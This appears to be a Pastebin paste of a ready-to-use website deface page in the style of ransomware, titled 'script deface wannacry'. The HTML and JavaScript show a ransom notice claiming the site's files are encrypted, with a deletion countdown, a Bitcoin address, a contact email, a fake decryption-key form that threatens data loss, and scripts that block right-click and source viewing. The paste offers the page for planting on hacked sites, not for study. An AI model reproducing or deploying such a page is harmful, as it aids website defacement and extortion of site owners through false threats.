Advertisement
Ribang

script deface wannacry

Jul 4th, 2017
602
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.17 KB | None | 0 0
  1.  
  2.  
  3.  
  4. <html>
  5. <title>Website Locked!</title>
  6. <head>
  7. <style type="text/css">
  8.  
  9. a {
  10. color:#8080ff;
  11. }
  12. #kiri {
  13. float:left;
  14.  
  15.  
  16. }
  17.  
  18. #kiri-gambar {
  19. padding-left:30px;
  20. padding-top:30px;
  21. }
  22. #isi {
  23. padding-left:50px;
  24. }
  25.  
  26. #isi-content {
  27. background-color:white;
  28. width:65%;
  29. font-size:20px;
  30. text-align:left;
  31. margin-left:30%;
  32. padding-left:3px;
  33. padding-top:3px;
  34. padding-right:3px;
  35. padding-bottom:3px;
  36. }
  37.  
  38. #isi-judul {
  39. font-size:40px;
  40. color:white;
  41. padding-right:250px;
  42. text-align:center;
  43.  
  44.  
  45. }
  46.  
  47. #isi-window {
  48. text-align:left;
  49.  
  50. }
  51.  
  52. #isi-gambar {
  53. margin-left:30%;
  54.  
  55.  
  56. }
  57.  
  58. #isi-kolom {
  59. float:left;
  60. padding-left:30px;
  61. font-size:20px;
  62. color:white;
  63.  
  64.  
  65. }
  66.  
  67. input[type=text], select {
  68. width: 400px;
  69. margin: 8px 0;
  70. padding: 14px 20px;
  71.  
  72. border: 1px solid #ccc;
  73. border-radius: 4px;
  74. box-sizing: border-box;
  75. }
  76.  
  77. input[type=submit] {
  78. width: 175px;
  79. background-color: #4CAF50;
  80. color: white;
  81. padding: 16px 20px;
  82. margin: 8px 0;
  83. border: none;
  84. border-radius: 4px;
  85. cursor: pointer;
  86. }
  87.  
  88. #sisa-waktu {
  89. font-family:"Palatino Linotype", "Book Antiqua", Palatino, serif;
  90. font-size:30px;
  91. padding-left:30px;
  92. padding-top:30px;
  93. animation: blink-animation 1s steps(5, start) infinite;
  94. -webkit-animation: blink-animation 1s steps(5, start) infinite;
  95.  
  96. }
  97.  
  98. #hacked {
  99. padding-top:115px;
  100. font-family:"Palatino Linotype", "Book Antiqua", Palatino, serif;
  101. color:white;
  102. width:25%;
  103.  
  104.  
  105. }
  106. @keyframes blink-animation {
  107. to {
  108. visibility: hidden;
  109. }
  110. }
  111. @-webkit-keyframes blink-animation {
  112. to {
  113. visibility: hidden;
  114. }
  115. }
  116.  
  117. #timer {
  118. font-family:"Palatino Linotype", "Book Antiqua", Palatino, serif;
  119. font-size:25px;
  120. padding-left:30px;
  121. padding-top:none;
  122. color:white;
  123. }
  124.  
  125. #waktu {
  126. border:3px;
  127. color:white;
  128. }
  129.  
  130. #about {
  131. font-family:"Palatino Linotype", "Book Antiqua", Palatino, serif;
  132. font-size:20px;
  133. padding-left:30px;
  134. padding-top:100px;
  135. }
  136.  
  137. #countdown {
  138. font-family: sans-serif;
  139. color: #fff;
  140. display: inline-block;
  141. text-align: center;
  142. font-size: 30px;
  143. background: #ff6600;
  144. font-weight: 100;
  145. width:100%;
  146. }
  147. </style>
  148. </head>
  149. <head>
  150. </head>
  151. <body style="background:#990000;border: 25px solid #e20733;border-radius:4px;box-sizing: border-box;">
  152. <div id="kiri">
  153. <div id="kiri-gambar"><img src="http://www.homelandsecureit.com/wp-content/uploads/2011/01/security-padlock.gif" height="200px" width="200px"></div>
  154. <script type = "text/javascript">
  155. var cday;
  156. var timeInSecs;
  157. var ticker;
  158.  
  159. function getSeconds() {
  160. var now = new Date();
  161. var nowtime= now.getTime(); // time now in milliseconds
  162. var countdowntime = new Date(now.getFullYear(),now.getMonth(),now.getDate(),24,0,0); // 16 hrs = 4 pm
  163. // countdowntime - change time hh,mm,ss to whatever time required, e.g. 7,50,0 (0750)
  164.  
  165. var dy = 5 ; // Friday (day 5) - change for other days 0-6
  166. var atime = countdowntime.getTime();
  167. var diff = parseInt((atime - nowtime)/1000); // positive if date is in future
  168. if (diff >0) {
  169. cday = dy - now.getDay();
  170. }
  171. else {
  172. cday = dy - now.getDay() -1;
  173. }
  174. if (cday < 0) { cday += 7; } // aleady passed countdown time, so go for next week
  175. if (diff <= 0) { diff += (86400 * 7) }
  176. startTimer (diff);
  177. }
  178.  
  179. function startTimer(secs) {
  180. timeInSecs = parseInt(secs);
  181. ticker = setInterval("tick()",1000);
  182. tick(); // to start counter display right away
  183. }
  184.  
  185. function tick() {
  186. var secs = timeInSecs;
  187. if (secs>0) {
  188. timeInSecs--;
  189. }
  190. else {
  191. clearInterval(ticker); // stop counting at zero
  192. getSeconds(); // and start all over again!
  193. }
  194.  
  195. var days = Math.floor(secs/86400);
  196. secs %= 86400;
  197. var hours= Math.floor(secs/3600);
  198. secs %= 3600;
  199. var mins = Math.floor(secs/60);
  200. secs %= 60;
  201. var result = days +":";
  202. result += ((hours < 10 ) ? "0":"" ) + hours + ":" + ( (mins < 10) ? "0" : "" ) + mins
  203. + ":" + ( (secs < 10) ? "0":"" ) + secs + "";
  204. document.getElementById("countdown").innerHTML = result;
  205. }
  206.  
  207.  
  208. var isCtrl = false;
  209. document.onkeyup=function(e)
  210. {
  211. if(e.which == 17)
  212. isCtrl=false;
  213. }
  214. document.onkeydown=function(e)
  215. {
  216. if(e.which == 17)
  217. isCtrl=true;
  218. if((e.which == 85) || (e.which == 67) && (isCtrl == true))
  219. {
  220. return false;
  221. }
  222. }
  223. var isNS = (navigator.appName == "Netscape") ? 1 : 0;
  224. if(navigator.appName == "Netscape") document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
  225. function mischandler(){
  226. return false;
  227. }
  228. function mousehandler(e){
  229. var myevent = (isNS) ? e : event;
  230. var eventbutton = (isNS) ? myevent.which : myevent.button;
  231. if((eventbutton==2)||(eventbutton==3)) return false;
  232. }
  233. document.oncontextmenu = mischandler;
  234. document.onmousedown = mousehandler;
  235. document.onmouseup = mousehandler;
  236.  
  237. </script>
  238. <div id="waktu">
  239. <div id="sisa-waktu">
  240. All files will be delete on :
  241. </div>
  242. <div id="timer">
  243. <body onload = "getSeconds()">
  244. <div id="CountDownLogo">
  245. <span id="title"</span>
  246. <br><br>
  247. <span id="countdown"> </span>
  248. </div>
  249. </div>
  250. </div>
  251.  
  252. <div id="about">
  253. <a href="https://en.wikipedia.org/wiki/Bitcoin" target="_blank">About BitCoin</a><br><br>
  254. <a href="https://www.bitcoin.com/buy-bitcoin" target="_blank">How to buy BitCoin ?</a><br><br>
  255. <a href="mailto:rextor403@gmail.com"><b>Contact Us</b></a>
  256. </div>
  257. </div>
  258. <div id="isi">
  259. <br>
  260. <br>
  261. <div id="isi-judul">Ooops, your website have been encrypted!</div>
  262. <br>
  263. <br>
  264. <div id="isi-content">
  265. <div id="content-judul">
  266. <u><b>What happened to my website ?</u></b></style><br>
  267. </div>
  268. Your important website files are encrypted.
  269. Many of your .php, .css, .js, and other files are no longer accessible
  270. because they have been encrypted. Maybe you are busy looking for a way to
  271. recover your files, but do not waste your time! Nobody can decrypt your files
  272. without our special decryption service.
  273. <br>
  274. <br>
  275. <div id="content-judul">
  276. <u><b>Can i recover my website ?</u></b></style><br>
  277. </div>
  278. Sure, we guarantee that you can recover all your files safely and easily. But you have not enough time.
  279. You can decrypt all your website file safely, how ? You must pay with Bitcoin and Paypal (paypal must contact me).
  280. <br>
  281. <br>
  282. <div id="content-judul">
  283. <u><b>How do i pay ?</u></b></style><br>
  284. </div>
  285. Payment is accepted with Bitcoin only, we are not using Paypal, CC, etc. and if you want to pay via paypal contact me! [Contact Us], For more information
  286. please click [About BitCoin].
  287. For more information, click [How to buy BitCoin]
  288. And send the correct amount to the address specified in below
  289. After your payment, send payment receipt to email address [Contact Us], and we will send unlock key to you.
  290. <br>
  291. <br>
  292. <div id="content-judul">
  293. <u><b>Contact ?</u></b></style><br>
  294. </div>
  295. If you need our assistance, send a message by clicking [Contact Us]
  296. </div>
  297. <br>
  298. <div id="isi-window">
  299. <div id="isi-gambar"><img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTKAnP6a0_qv1qIt-rHjDltkInvW1BSdoObHKRfpgPFF00DcCZp" align="left"></div>
  300. <div id="isi-kolom">
  301. Payment 1 BTC=</font><font color="yellow"> 37RGqjSKhGeEPk9PHp5yPKZ2b6DiAnq3UP</font><br>
  302. <form action="" method="post" style=" text-align: center;">
  303. <label><b><div id="judul" style="font-size:20px;font-family:Lucida Sans Unicode, Lucida Grande, sans-serif;">KEY : </b></label>
  304. <input type="text" name="key" class="inpute" placeholder="DECRYPT KEY">
  305. <select name="method" class="selecte" style="display:none;">
  306. <option value="2"><b>DECRYPT</b></option>
  307. </select>
  308. <input type="submit" name="submit" class="submite" value="Submit" />
  309. <div id="warning" style="font-size:13px;color:red;">DO NOT INPUT WRONG KEY, BECAUSE IT MAKES ALL YOUR FILE DATA PERMANENTLY LOST!!</div>
  310. </form>
  311.  
  312.  
  313. </div>
  314. </div>
  315. <br>
  316. <br>
  317. <center>
  318. <div id="hacked"><marquee>Hacked by BL△CK_C▲т</marquee>
  319. <br>
  320. <iframe width="560" height="315" src="https://www.youtube.com/embed/LApS9G22cIU?autoplay=1" frameborder="0" allowfullscreen style="display:none;"></iframe>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement